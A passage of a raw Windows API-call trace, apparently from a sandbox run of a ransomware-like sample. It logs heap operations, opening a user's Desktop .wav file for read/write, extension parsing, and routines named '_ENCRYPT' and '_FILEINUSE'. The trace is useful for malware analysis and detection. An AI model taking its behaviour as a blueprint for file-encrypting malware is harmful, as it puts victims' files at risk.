Size=0x10) returned 0x889508 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0032.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.431] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.432] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.432] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.432] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.432] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0032.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.433] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xc3a, lpOverlapped=0x0) returned 1 [0032.433] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.434] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xc3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.434] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.435] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.435] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.435] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.435] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.435] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.435] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.435] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.435] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.435] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c868 [0032.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c868, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.436] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_wgswrxraqidmfu5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.436] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.436] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.436] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.437] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.437] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0032.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8896a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.437] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.437] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.437] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.437] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.437] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.437] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.437] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0032.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.438] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.438] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.438] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.438] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe74f0990, ftCreationTime.dwHighDateTime=0x1d5c506, ftLastAccessTime.dwLowDateTime=0xb2382ea0, ftLastAccessTime.dwHighDateTime=0x1d5bf46, ftLastWriteTime.dwLowDateTime=0xb2382ea0, ftLastWriteTime.dwHighDateTime=0x1d5bf46, nFileSizeHigh=0x0, nFileSizeLow=0x13bb6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="_WgswrxrAQIdMFU5.wav", cAlternateFileName="_WGSWR~1.WAV")) returned 0x7c20c0 [0032.438] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.439] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.439] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe74f0990, ftCreationTime.dwHighDateTime=0x1d5c506, ftLastAccessTime.dwLowDateTime=0xb2382ea0, ftLastAccessTime.dwHighDateTime=0x1d5bf46, ftLastWriteTime.dwLowDateTime=0xb2382ea0, ftLastWriteTime.dwHighDateTime=0x1d5bf46, nFileSizeHigh=0x0, nFileSizeLow=0x13bb6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="_WgswrxrAQIdMFU5.wav", cAlternateFileName="_WGSWR~1.WAV")) returned 0x7c20c0 [0032.440] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.440] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS 